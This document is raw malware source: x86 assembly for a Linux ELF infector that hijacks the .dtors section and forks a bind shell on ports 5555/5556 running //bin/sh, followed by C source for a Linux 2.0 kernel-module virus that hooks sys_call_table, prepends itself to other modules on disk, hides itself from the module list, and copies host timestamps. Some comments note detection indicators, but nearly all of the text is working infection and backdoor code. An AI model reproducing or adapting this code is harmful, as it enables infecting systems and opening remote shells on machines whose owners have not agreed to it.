xor eax, eax
mov al, [esp] ; eax = offsset next name
add esp, eax ;
mov al, [esp] ;
push ebx ;
ret
;---------------------------------------------------------------------------
;
;in : fd in ebx
;out : result of read in eax
; read(fd, stack dword, 4); the dword read is popped into eax (the byte
; count returned by the kernel is discarded).
read:
xor eax, eax
mov al, sys_read
sub esp, 4 ;
mov ecx, esp
mov edx, 4
int 0x80 ;
pop eax ; dword read in eax
ret
;-------------------------------------------------------------------------------
;
;in : fd file in ebx
;out : pointer of map file in eax
; old_mmap takes one pointer to an argument block; it is built on the stack
; (pushed in reverse): addr = 0, len = ecx, prot = 3 (PROT_READ|PROT_WRITE),
; flags = 1 (MAP_SHARED), fd, offset = 0. ebx is preserved via edx.
Mapping:
xor edx, edx
push edx                            ; offset = 0
push ebx                            ; fd
inc edx
push edx                            ; flags = 1
inc edx
inc edx
push edx                            ; prot = 3
push ecx                            ; len
xor eax, eax
push eax                            ; addr = 0
mov al, sys_mmap
xchg ebx, edx                       ; keep fd in edx
mov ebx, esp                        ; ebx -> argument block
int 0x80
xchg ebx, edx                       ; fd back in ebx
add esp, 0x18
ret
;-------------------------------------------------------------------------------
;
;in : ecx size of mapping
;out : eax == 0 if succes
; munmap(addr = 0, len = ecx)
Demap:
xor eax, eax
mov al, sys_munmap
xor ebx, ebx
int 0x80
ret
;-------------------------------------------------------------------------------
;
;in : eax = address of the mapped file
;out : ebp = new p_vaddr of the segment that starts at file offset 0
; For each program header: PT_PHDR (type 6) -> vaddr/paddr -= 0x1000;
; the segment with p_offset == 0 (text) -> vaddr/paddr -= 0x1000 and
; filesz/memsz += 0x1000; any other -> p_offset += 0x1000 (it was moved
; up one page by infection).
PatchSegment:
xor ecx, ecx
mov cl, BYTE [eax+0x2c]; ecx = number of segments   -- e_phnum, low byte
mov edx, [eax+0x1c] ; edx pointer to phdr
add edx, eax
rygo:
push ecx ;
mov ecx, 0x06
cmp [edx], ecx ;                    -- p_type == PT_PHDR ?
jne hi
mov ecx, 0x1000
sub [edx+0x08], ecx
sub [edx+0x0c], ecx ; patch phdr.
jmp ha
hi: xor ecx, ecx
cmp [edx+0x04], ecx ; test if TEXT segment.   -- p_offset == 0
jne ho
mov ecx, 0x1000
sub [edx+0x08], ecx
sub [edx+0x0c], ecx
add [edx+0x10], ecx
add [edx+0x14], ecx ; patch phdr.
mov ebp, [edx+08h] ; ebp pointer to viral code   -- new p_vaddr; infection adds the file offset to it
jmp ha
ho: mov ecx, 0x1000
add [edx+04], ecx ; add a memory segment   -- p_offset += 0x1000
ha:
pop ecx
dec ecx
test ecx, ecx ; other segments ?
je good ;
add dl, BYTE [eax+0x2a]; if yes we go patch the other   -- edx += e_phentsize (8-bit add)
jmp rygo
good:
ret
;----------------------------------------------------------------------------
;
;in : eax = address of the mapped file
;out : every sh_offset except section 0's is increased by 0x1000
; The table itself is read at e_shoff + 0x1000, i.e. where infection moved it.
PatchSection:
mov edx, [eax+0x20]
add edx, eax
add edx, 0x1000 ; e_shoff
xor ecx, ecx
mov cx, [eax+0x30] ; number of sections.
dec ecx                             ; section 0 (SHT_NULL) is skipped
xor esi, esi
mov si, [eax+0x2E] ; e_shentsize
patch:
add edx, esi
mov ebx, [edx+0x10] ; sh_offset
add ebx, 0x1000
mov [edx+0x10], ebx
loop patch
ret
;-----------------------------------------------------------------------------
;in : pointer to adress of file mmaping in ebx
;out : eax == 0 if functions fail
; in : ebp = virtual address of the viral code.
; Finds the section whose name starts with ".dto" via .shstrtab, then
; writes ebp over the first zero entry of that section (entries after the
; leading 0xFFFFFFFF). The host therefore runs the virus as a destructor,
; after main: an unexpected .dtors entry pointing into the text segment's
; first page is the persistence indicator. Uses an 8-bit multiply, so
; e_shstrndx must be < 256 and only the low byte of e_shentsize is used.
hijackDtors:
;find the sh_offset of .shstrtab(e_shentsize*e_shstrndx+e_shoff+adresse map)
xor eax, eax
mov ax, [ebx+0x2E] ; e_shentsize
mov cl, [ebx+0x32] ; e_shstrndx on 8bits!!!(nb_section<255)
mul cl ;
;
add eax, [ebx+0x20] ; + e_shoff == offset shdr .shstrtab
add eax, ebx ; + adress of file maping
mov esi, eax
add esi, 0x10 ; sh_offset of .shstrtab
;looking for .dtors in sh_name of each sections
xor eax, eax
mov eax, [ebx+0x20] ; offset shdr
add eax, ebx ;
xor ecx, ecx
mov cx, [ebx+0x30] ; e_shnum
mov edi, [esi] ; edi == offset .shstrtab
add edi, ebx ;
xor edx, edx
next_shname:
xor edx, edx
mov dx, WORD [ebx+0x2E]
add eax, edx ; next shdr (we don't read the first)
mov esi, [eax]                      ; sh_name (string table offset)
add esi, edi
mov edx, [esi]
cmp edx, '.dto'                     ; compares only 4 characters
je dtor_finding
loop next_shname
xor eax, eax ; if don't find it
ret ;
;find the last entry in .dtors tab, and write a new entry :)
dtor_finding:
mov ecx, [eax+0x10] ; sh_offset of .dtors
add ecx, ebx ; + map
next_dtor:
add ecx, 4 ; don't check the first entry (must
mov edx, [ecx] ; be 0xFFFFFFFF)
cmp edx, 0
jne next_dtor
mov DWORD [ecx], ebp ; offset of viral code   -- overwrites the terminating 0
ret
;----------------------------------------------------------------------------
;bind a shell on port 5556 if uid = 0 else bind a shell on port 5555
; bomb: fork(); the child runs bindshell and never returns, the parent
; returns to the caller. What a defender sees: a child of the infected
; process with a listening TCP socket on 5555 (5556 when running as root)
; on INADDR_ANY, and on connection a //bin/sh whose fds 0-4 are that socket.
; All socket operations go through socketcall (sys_socket = 102) with the
; sub-function in ebx: 1 socket, 2 bind, 4 listen, 5 accept.
bomb:
xor eax, eax
mov al, sys_fork ;fork the logical bomb
int 0x80
test eax, eax
je bindshell ; the son bind the shell
ret ; the father exit
bindshell:
;socket(family, type, proto)
xor eax, eax
cdq
mov al, sys_socket
push edx ; 0=IP
inc edx
push edx ; 1=SOCK_STREAM
inc edx
push edx ; 2=AF_INET
mov ecx, esp
push byte 1
pop ebx ; 1 -> socket
int 0x80
;bind(socket, addr, lenng)
mov edi, eax                        ; edi = listening socket
cdq                                 ; edx = 0 (INADDR_ANY below)
xor ecx, ecx
mov cx, 0xB315                      ; port 5555 in network byte order
xor eax, eax
mov al, sys_getuid
int 0x80
test eax, eax ;if uid != 0
jne binduser ;goto binduser
inc ch ;                            -- 0xB415 = port 5556 for uid 0
binduser:
push edx                            ; sin_addr = 0
push word cx ; port = 5556 if uid(0) else port = 5555
inc ebx
push bx ; (0002 = AF_INET)
mov ecx, esp ; ecx = offset sockaddr struct
push byte 16 ; len
push ecx ; push offset sockaddr struct
push edi ; handle socket
mov ecx, esp
xor eax, eax
mov al, sys_socket                  ; ebx = 2 -> bind
int 0x80
;If bind fail the process send to himself a SIGKILL
test eax, eax
je listen
xor eax, eax
mov al, sys_getpid
int 0x80
xchg ebx, eax
xor ecx, ecx
mov cl, SIGKILL
xor eax, eax
mov al, sys_kill
int 0x80
;listen(socket, backlog)
listen:
mov al, sys_socket
mov bl, LISTEN                      ; ecx still points at the bind argument block
int 0x80
;accept(socket, addr, len)
push eax
push edi
mov ecx, esp
inc ebx ; 5 -> accept
mov al, sys_socket
int 0x80
;dup2()
dup:
mov ecx, ebx                        ; ecx = 5 on the first pass
mov ebx, eax                        ; ebx = accepted socket
dec ecx
mov al, sys_dup2
int 0x80                            ; dup2(socket, 4), then 3, 2, 1, 0
inc ecx
loop dup
;execve /bin/sh
mov al, sys_exec
push ecx                            ; ecx = 0: string terminator
push 0x68732f6e                     ; "n/sh"
push 0x69622f2f                     ; "//bi"  -> "//bin/sh"
mov ebx, esp
push ecx                            ; argv[1] = NULL
push ebx                            ; argv[0]
mov ecx, esp
int 0x80                            ; execve("//bin/sh", argv, edx = 0 envp)
fin_code:
Kody
/* Linux 2.0.x loadable-module virus. It hooks sys_call_table so that
 * create_module / delete_module are intercepted: every module loaded while
 * it is resident gets the first MODLEN bytes of this image prepended on
 * disk (see new_delete_module / infectfile). Slot __NR_our_syscall (211)
 * is a private syscall used only to detect an already-resident copy.
 * Detection on such a kernel: sys_call_table entries for 128/129 pointing
 * outside the kernel image, an unexpected syscall 211 answering 0 to the
 * argument 0x40, module files under default_path[] whose bytes at
 * MODLEN+1 read "ELF" (is_infected), and a module with an empty name and
 * zero size in the module list (init_module2 blanks mp->name/size). */
#define __KERNEL__
#define MODULE
#define MODLEN 6196                 /* size of the viral prefix written to hosts */
#define ENOUGH 7                    /* after this many infections the hooks are removed */
#define BEGIN_KMEM {unsigned long old_fs=get_fs();set_fs(get_ds());
#define END_KMEM set_fs(old_fs);}   /* let the file syscalls accept kernel-space pointers */
/* i'm not sure we need all of 'em ...*/
#include <linux/version.h>
#include <linux/mm.h>
#include <linux/unistd.h>
#include <linux/fs.h>
#include <linux/types.h>
#include <asm/errno.h>
#include <asm/string.h>
#include <linux/fcntl.h>
#include <sys/syscall.h>
#include <linux/module.h>
#include <linux/malloc.h>
#include <linux/kernel.h>
#include <linux/kerneld.h>
#define __NR_our_syscall 211
#define MAXPATH 30
/*#define DEBUG*/
#ifdef DEBUG
#define DPRINTK(format, args...) printk(KERN_INFO format,##args)
#else
#define DPRINTK(format, args...)
#endif
/* where the sys_calls are */
extern void * sys_call_table [];
/* tested only with kernel 2.0.33, but thiz should run under 2.x.x
 * if you change the default_path[] values
 */
/* directories searched by get_mod_name() for a bare module file name */
static char * default_path [] = {
"." , "/linux/modules" ,
"/lib/modules/2.0.33/fs" ,
"/lib/modules/2.0.33/net" ,
"/lib/modules/2.0.33/scsi" ,
"/lib/modules/2.0.33/block" ,
"/lib/modules/2.0.33/cdrom" ,
"/lib/modules/2.0.33/ipv4" ,
"/lib/modules/2.0.33/misc" ,
"/lib/modules/default/fs" ,
"/lib/modules/default/net" ,
"/lib/modules/default/scsi" ,
"/lib/modules/default/block" ,
"/lib/modules/default/cdrom" ,
"/lib/modules/default/ipv4" ,
"/lib/modules/default/misc" ,
"/lib/modules/fs" ,
"/lib/modules/net" ,
"/lib/modules/scsi" ,
"/lib/modules/block" ,
"/lib/modules/cdrom" ,
"/lib/modules/ipv4" ,
"/lib/modules/misc" ,
0
};
/* symbols exported to later module loads (registered from init_module2) */
static struct symbol_table my_symtab = {
#include <linux/symtab_begin.h>
X ( printk ),
X ( vmalloc ),
X ( vfree ),
X ( kerneld_send ),
X ( current_set ),
X ( sys_call_table ),
X ( register_symtab_from ),
#include <linux/symtab_end.h>
};
/* names recorded by new_create_module, consumed by new_delete_module */
char files2infect [ 7 ][ 60 + 2 ];
/* const char kernel_version[] = UTS_RELEASE; */
int (* old_create_module )( char *, int );   /* originals saved before hooking */
int (* old_delete_module )( char *);
int (* open )( char *, int , int );          /* fetched from sys_call_table in init_module2 */
int (* close )(int);
int (* unlink )( char *);
int our_syscall (int);
int infectfile ( char *);
int is_infected ( char *);
int cp ( struct file *, struct file *);
int writeVir ( char *, char *);
int init_module2 ( struct module *);
char * get_mod_name ( char *);
/* needed to be global */
void * VirCode = NULL ;                      /* MODLEN-byte viral image, filled by load_real_mod */
/* install new syscall to see if we are already in kmem */
/* Private syscall at __NR_our_syscall: returns 0 for the magic argument
 * 0x40 and -ENOSYS otherwise, so a second copy can tell a resident one is
 * present (init_module2 tests the table slot). */
int our_syscall ( int mn )
{
/* magic number: 40hex :-) */
if ( mn == 0x40 )
return 0 ;
else
return - ENOSYS ;
}
/* Hook for sys_create_module: calls the original and, on success, records
 * the module name (copied byte by byte from user space with get_fs_byte,
 * at most 60 bytes) in the first free files2infect slot. The infection
 * itself is deferred to new_delete_module. */
int new_create_module ( char * name , int size )
{
int i = 0 , j = 0 , retval = 0 ;
if (( retval = old_create_module ( name , size )) < 0 )
return retval ;
/* find next free place */
for ( i = 0 ; files2infect [ i ][ 0 ] && i < 7 ; i ++);
if ( i == 6 )
return retval ;
/* get name of mod from user-space */
while (( files2infect [ i ][ j ] = get_fs_byte ( name + j )) != 0 && j < 60 )
j ++;
DPRINTK ( "in new_create_module: got %s as #%d\n" , files2infect [ i ], i );
return retval ;
}
/* we infect modules after sys_delete_module, to be sure
 * we don't confuse the kernel
 */
/* Hook for sys_delete_module. After the real call, every recorded name is
 * given a ".o" suffix, resolved to a path with get_mod_name(), infected
 * unless is_infected() says it already is, and its slot cleared. Once
 * `infected` reaches ENOUGH the hooks are removed via cleanup_module(). */
int new_delete_module ( char * modname )
{
static int infected = 0 ;
int retval = 0 , i = 0 ;
char * s = NULL , * name = NULL ;
retval = old_delete_module ( modname );
if (( name = ( char *) vmalloc ( MAXPATH + 60 + 2 )) == NULL )
return retval ;
for ( i = 0 ; files2infect [ i ][ 0 ] && i < 7 ; i ++) {
strcat ( files2infect [ i ], ".o" );
if (( s = get_mod_name ( files2infect [ i ])) == NULL ) {
return retval ;
}
name = strcpy ( name , s );
if (! is_infected ( name )) {
DPRINTK ( "try 2 infect %s as #%d\n" , name , i );
infected ++;
infectfile ( name );
}
memset ( files2infect [ i ], 0 , 60 + 2 );
} /* for */
/* its enough */
if ( infected >= ENOUGH )
cleanup_module ();
vfree ( name );
return retval ;
}
/* lets take a look at sys_init_module(), that calls
* our init_module() compiled with
* CFLAG = ... -O2 -fomit-frame-pointer
* in C:
* ...
* if((mp = find_module(name)) == NULL)
* ...
*
* is in asm:
* ...
* call find_module
* movl %eax, %ebp
* ...
* note that there is no normal stack frame !!!
* thats the reason, why we find 'mp' (return from find_module) in %ebp
* BUT only when compiled with the fomit-frame-pointer option !!!
* with a stackframe (pushl %ebp; movl %esp, %ebp; subl $124, %esp)
* you should find mp at -4(%ebp) .
* thiz is very bad hijacking of local vars and an own topic.
* I hope you do not get an seg. fault.
*/
/* init_module written in asm: pushes %ebp -- assumed (see the comment
 * above) to still hold sys_init_module's local `mp` when the kernel was
 * built with -fomit-frame-pointer -- as the argument of init_module2(),
 * then returns 0. This only works for that one compiler configuration. */
__asm__
( "
.align 16
.globl init_module
.type init_module,@function
init_module:
pushl %ebp /* ebp is a pointer to mp from sys_init_module() */
/* and the parameter for init_module2() */
call init_module2
popl %eax
xorl %eax, %eax /* all good */
ret /* and return */
.hype27:
.size init_module,.hype27-init_module
" );
/* for the one with no -fomit-frame-pointer and no -O2 this should (!) work:
*
* pushl %ebx
* movl %ebp, %ebx
* pushl -4(%ebx)
* call init_module2
* addl $4, %esp
* xorl %eax, %eax
* popl %ebx
* ret
*/
/*----------------------------------------------*/
/* Real module entry, called with the kernel's struct module for this load.
 * Builds "<name>.o", hides the module (empty name, ref and size 0), and --
 * only if __NR_our_syscall is still free, i.e. no copy is resident --
 * installs the three sys_call_table hooks and exports my_symtab. Then it
 * caches open/close/unlink from the table, resolves the module file on
 * disk and hands it to load_real_mod(), which strips the viral prefix and
 * asks kerneld to load the original host module. */
int init_module2 ( struct module * mp )
{
char * s = NULL , * mod = NULL , * modname = NULL ;
long state = 0 ;
mod = vmalloc ( 60 + 2 );
modname = vmalloc ( MAXPATH + 60 + 2 );
if (! mod || ! modname )
return - 1 ;
strcpy ( mod , mp -> name );
strcat ( mod , ".o" );
MOD_INC_USE_COUNT ;                          /* never decremented: the module cannot be unloaded normally */
DPRINTK ( "in init_module2: mod = %s\n" , mod );
/* take also a look at phrack#52 ...*/
mp -> name = "" ;                            /* hide from the module list */
mp -> ref = 0 ;
mp -> size = 0 ;
/* thiz is our new main ,look for copys in kmem ! */
if ( sys_call_table [ __NR_our_syscall ] == 0 ) {
old_delete_module = sys_call_table [ __NR_delete_module ];
old_create_module = sys_call_table [ __NR_create_module ];
sys_call_table [ __NR_our_syscall ] = ( void *) our_syscall ;
sys_call_table [ __NR_delete_module ] = ( void *) new_delete_module ;
sys_call_table [ __NR_create_module ] = ( void *) new_create_module ;
memset ( files2infect , 0 , ( 60 + 2 )* 7 );
register_symtab (& my_symtab );
}
register_symtab ( 0 );
open = sys_call_table [ __NR_open ];
close = sys_call_table [ __NR_close ];
unlink = sys_call_table [ __NR_unlink ];
if (( s = get_mod_name ( mod )) == NULL )
return - 1 ;
modname = strcpy ( modname , s );
load_real_mod ( modname , mod );
vfree ( mod );
vfree ( modname );
return 0 ;
}
/* Unhook: restores the two original syscall entries, clears the private
 * slot and frees the cached viral image. Also called from
 * new_delete_module once ENOUGH infections have been made. */
int cleanup_module ()
{
sys_call_table [ __NR_delete_module ] = old_delete_module ;
sys_call_table [ __NR_create_module ] = old_create_module ;
sys_call_table [ __NR_our_syscall ] = NULL ;
DPRINTK ( "in cleanup_module\n" );
vfree ( VirCode );
return 0 ;
}
/* returns 1 if infected;
 * seek at position MODLEN + 1 and read out 3 bytes,
 * if it is "ELF" it seems the file is already infected
 */
/* An infected module is <MODLEN viral bytes><original ELF file>, so the
 * host's ELF magic sits at offset MODLEN and the letters "ELF" at
 * MODLEN + 1 -- the same check works as a scanner for this strain.
 * Returns 1 / 0, or -1 / -2 when the file cannot be opened. */
int is_infected ( char * filename )
{
char det [ 4 ] = { 0 };
int fd = 0 ;
struct file * file ;
DPRINTK ( "in is_infected: filename = %s\n" , filename );
BEGIN_KMEM
fd = open ( filename , O_RDONLY , 0 );
END_KMEM
if ( fd <= 0 )
return - 1 ;
if (( file = current -> files -> fd [ fd ]) == NULL )
return - 2 ;
file -> f_pos = MODLEN + 1 ;
DPRINTK ( "in is_infected: file->f_pos = %d\n" , file -> f_pos );
BEGIN_KMEM
file -> f_op -> read ( file -> f_inode , file , det , 3 );
close ( fd );
END_KMEM
DPRINTK ( "in is_infected: det = %s\n" , det );
if ( strcmp ( det , "ELF" ) == 0 )
return 1 ;
else
return 0 ;
}
/* copy the host-module to tmp, write VirCode to
 * hostmodule, and append tmp.
 * then delete tmp.
 */
/* Result on disk: filename = VirCode (MODLEN bytes) followed by the
 * original module. The fixed temp path /tmp/t000 is a transient artefact
 * of each infection. Returns 0, or -1 if a file could not be opened. */
int infectfile ( char * filename )
{
char * tmp = "/tmp/t000" ;
int in = 0 , out = 0 ;
struct file * file1 , * file2 ;
BEGIN_KMEM
in = open ( filename , O_RDONLY , 0640 );
out = open ( tmp , O_RDWR | O_TRUNC | O_CREAT , 0640 );
END_KMEM
DPRINTK ( "in infectfile: in = %d out = %d\n" , in , out );
if ( in <= 0 || out <= 0 )
return - 1 ;
file1 = current -> files -> fd [ in ];
file2 = current -> files -> fd [ out ];
if (! file1 || ! file2 )
return - 1 ;
/* save hostcode */
cp ( file1 , file2 );
BEGIN_KMEM
file1 -> f_pos = 0 ;                         /* rewind: the host is rewritten through its read-only fd */
file2 -> f_pos = 0 ;
/* write Vircode [from mem] */
DPRINTK ( "in infetcfile: filenanme = %s\n" , filename );
file1 -> f_op -> write ( file1 -> f_inode , file1 , VirCode , MODLEN );
/* append hostcode */
cp ( file2 , file1 );
close ( in );
close ( out );
unlink ( tmp );
END_KMEM
return 0 ;
}
/* Reverse of infectfile: copies the file to /tmp/t000, unlinks and
 * recreates it, then copies back everything after the first MODLEN bytes.
 * Used by load_real_mod() to put the clean host module back before kerneld
 * loads it. Returns 0, or -1 on open failures. */
int disinfect ( char * filename )
{
char * tmp = "/tmp/t000" ;
int in = 0 , out = 0 ;
struct file * file1 , * file2 ;
BEGIN_KMEM
in = open ( filename , O_RDONLY , 0640 );
out = open ( tmp , O_RDWR | O_TRUNC | O_CREAT , 0640 );
END_KMEM
DPRINTK ( "in disinfect: in = %d out = %d\n" , in , out );
if ( in <= 0 || out <= 0 )
return - 1 ;
file1 = current -> files -> fd [ in ];
file2 = current -> files -> fd [ out ];
if (! file1 || ! file2 )
return - 1 ;
/* save hostcode */
cp ( file1 , file2 );
BEGIN_KMEM
close ( in );
DPRINTK ( "in disinfect: filename = %s\n" , filename );
unlink ( filename );
in = open ( filename , O_RDWR | O_CREAT , 0640 );
END_KMEM
if ( in <= 0 )
return - 1 ;
file1 = current -> files -> fd [ in ];
if (! file1 )
return - 1 ;
file2 -> f_pos = MODLEN ;                    /* skip the viral prefix in the saved copy */
cp ( file2 , file1 );
BEGIN_KMEM
close ( in );
close ( out );
unlink ( tmp );
END_KMEM
return 0 ;
}
/* a simple copy routine, that expects the file struct pointer
 * of the files to be copied.
 * So its possible to append files due to copieng.
 */
/* Copies from file1's current f_pos to file2's current f_pos in 10000-byte
 * chunks, then copies i_mode and the a/m/ctime inode fields across -- so
 * an infected module keeps the host's mode and timestamps, and timestamp
 * comparison alone will not reveal it. Returns 0, -1 if vmalloc fails. */
int cp ( struct file * file1 , struct file * file2 )
{
int in = 0 , out = 0 , r = 0 ;
char * buf ;
if (( buf = ( char *) vmalloc ( 10000 )) == NULL )
return - 1 ;
DPRINTK ( "in cp: f_pos = %d\n" , file1 -> f_pos );
BEGIN_KMEM
while (( r = file1 -> f_op -> read ( file1 -> f_inode , file1 , buf , 10000 )) > 0 )
file2 -> f_op -> write ( file2 -> f_inode , file2 , buf , r );
file2 -> f_inode -> i_mode = file1 -> f_inode -> i_mode ;
file2 -> f_inode -> i_atime = file1 -> f_inode -> i_atime ;
file2 -> f_inode -> i_mtime = file1 -> f_inode -> i_mtime ;
file2 -> f_inode -> i_ctime = file1 -> f_inode -> i_ctime ;
END_KMEM
vfree ( buf );
return 0 ;
}
/* Is that simple: we disinfect the module [hide 'n seek]
 * and send a request to kerneld to load
 * the orig mod. N0 fuckin' parsing for symbols and headers
 * is needed - cool.
 */
/* path_name = on-disk path of the module that was just loaded (this
 * image + host), name = its bare file name. Reads the first MODLEN bytes
 * into VirCode (the image prepended to future hosts), rewrites the file
 * without them (disinfect) and asks kerneld via request_module() to load
 * the host module -- so the user still gets the module they asked for.
 * The request_module() result is only logged. */
int load_real_mod ( char * path_name , char * name )
{
int r = 0 , i = 0 ;
struct file * file1 , * file2 ;
int in = 0 , out = 0 ;
DPRINTK ( "in load_real_mod name = %s\n" , path_name );
if ( VirCode )
vfree ( VirCode );
VirCode = vmalloc ( MODLEN );
if (! VirCode )
return - 1 ;
BEGIN_KMEM
in = open ( path_name , O_RDONLY , 0640 );
END_KMEM
if ( in <= 0 )
return - 1 ;
file1 = current -> files -> fd [ in ];
if (! file1 )
return - 1 ;
/* read Vircode [into mem] */
BEGIN_KMEM
file1 -> f_op -> read ( file1 -> f_inode , file1 , VirCode , MODLEN );
close ( in );
END_KMEM
disinfect ( path_name );
r = request_module ( name );
DPRINTK ( "in load_real_mod: request_module = %d\n" , r );
return 0 ;
}
/* Resolves a bare module file name by trying open() on
 * "<default_path[i]>/<mod>" in order and returning the first that opens,
 * in a static buffer shared by all callers. Returns NULL when the buffer
 * cannot be allocated or no candidate opened. If `mod` already contains a
 * '/', the search loop is skipped entirely (loop condition). */
char * get_mod_name ( char * mod )
{
int fd = 0 , i = 0 ;
static char * modname = NULL ;
if (! modname )
modname = vmalloc ( MAXPATH + 60 + 2 );
if (! modname )
return NULL ;
BEGIN_KMEM
for ( i = 0 ; ( default_path [ i ] && ( strstr ( mod , "/" ) == NULL )); i ++) {
memset ( modname , 0 , MAXPATH + 60 + 2 );
modname = strcpy ( modname , default_path [ i ]);
modname = strcat ( modname , "/" );
modname = strcat ( modname , mod );
if (( fd = open ( modname , O_RDONLY , 0640 )) > 0 )
break;
}
close ( fd );
END_KMEM
if (! default_path [ i ])
return NULL ;
return modname ;
}